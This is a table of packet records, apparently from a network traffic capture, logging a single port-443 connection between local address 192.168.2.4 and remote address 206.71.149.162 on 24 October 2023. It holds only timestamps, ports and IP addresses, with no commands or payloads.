| Oct 24, 2023 06:55:21.986493111 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.986977100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.987039089 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.987487078 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.987545967 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.987978935 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.988039970 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.988468885 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.988557100 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.988949060 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.989012003 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.991887093 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.991947889 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.992296934 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.992353916 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.992666960 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.992726088 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.993077040 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.993133068 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.993438959 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.993496895 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.148166895 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.148432970 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.148490906 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.148552895 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.149487019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.149580956 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.150202990 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.150260925 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.151767969 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.151839972 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.152257919 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.152324915 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.153240919 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.153301001 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.153780937 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.153847933 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.154479027 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.154546022 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.154844046 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.154911995 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.155440092 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.155503035 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.155812979 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.155874968 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.156569004 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.156627893 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.158595085 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.158659935 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.158816099 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.158869982 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.159317017 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.159375906 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.159782887 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.159837961 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.160307884 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.160378933 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.160715103 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.160768032 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.161149979 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.161211967 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.161799908 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.161861897 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.162281036 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.162339926 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.162750959 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.162812948 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.163144112 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.163198948 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.163765907 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.163847923 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.165353060 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.165415049 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.165844917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.165903091 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.166258097 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.166320086 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.166944981 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.167006016 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.167378902 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.167448997 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.168001890 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.168062925 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.168509007 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.168572903 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.169002056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.169063091 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.170799971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.170855999 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.171210051 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.171267033 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.171973944 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.172023058 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.176136971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.176199913 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.176886082 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.176943064 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.178704023 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.178772926 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.180018902 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.180088043 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.180372000 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.180423975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.180921078 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.180973053 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.181349993 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.181399107 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.181684017 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.181736946 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.181976080 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.182024956 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.182343960 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.182396889 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.182971001 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.183023930 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.183255911 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.183305025 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.183571100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.183629990 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.185620070 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.185678959 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.186594009 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.186649084 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555553913 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555567026 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555613995 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555685043 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555711031 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555727959 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555737019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555768013 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555777073 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555790901 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555805922 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555836916 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555836916 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555855989 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555905104 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555915117 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555958033 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.555968046 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.555974007 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556009054 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556021929 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556030989 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556077957 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556078911 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556087971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556129932 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556133032 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556143999 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556189060 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556190014 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556199074 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556243896 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556246996 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556256056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556302071 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556303024 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556313038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556355953 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556361914 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556374073 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556380987 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556407928 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556412935 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556438923 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556446075 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556469917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556471109 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556495905 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556502104 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556520939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556531906 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556571007 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556571007 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556581974 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556627035 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556627989 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556637049 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556684971 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556690931 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556699038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556742907 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556750059 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556756973 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556791067 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556792974 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556813002 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556818008 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556840897 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556844950 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556868076 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556874037 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556895971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556900024 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556926966 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556932926 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556947947 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556958914 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.556994915 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.556999922 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557007074 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557041883 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557049990 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557055950 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557086945 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557090998 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557111979 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557121038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557141066 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557147980 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557172060 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557176113 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557188034 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557204008 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557234049 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557241917 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557249069 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557292938 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557349920 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557394981 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557398081 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557404995 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557444096 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557449102 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557457924 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557496071 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557504892 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557549953 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557555914 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557563066 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557595968 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557600975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557624102 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557630062 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557652950 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557653904 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557681084 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557688951 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557708979 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557712078 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557738066 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557743073 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557769060 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557770967 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557794094 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557799101 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557815075 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557823896 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557849884 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557854891 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557868004 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557882071 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557912111 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557918072 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557929039 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.557965994 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.557977915 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558026075 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558032036 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558038950 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558068037 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558069944 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558089972 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558095932 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558114052 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558120012 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558141947 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558147907 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558172941 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558173895 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
